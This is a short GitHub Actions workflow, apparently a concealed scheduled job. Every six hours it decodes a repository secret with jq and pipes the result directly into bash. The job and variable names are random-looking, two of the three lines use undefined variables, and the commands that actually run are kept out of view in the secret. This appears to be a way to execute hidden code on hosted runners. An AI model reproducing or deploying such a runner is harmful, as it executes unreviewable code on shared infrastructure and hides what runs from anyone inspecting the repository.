name: spilltherapy
on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: spilltherapy
        env:
          yxfur75: ${{ secrets.yxfur75 }}
        run: |
          echo $yxfur75 | jq -r .x192 | /bin/bash
          echo $k95 | jq -r .mbn58860 | /bin/bash
          echo $c5374 | jq -r .fqvtn1 | /bin/bash

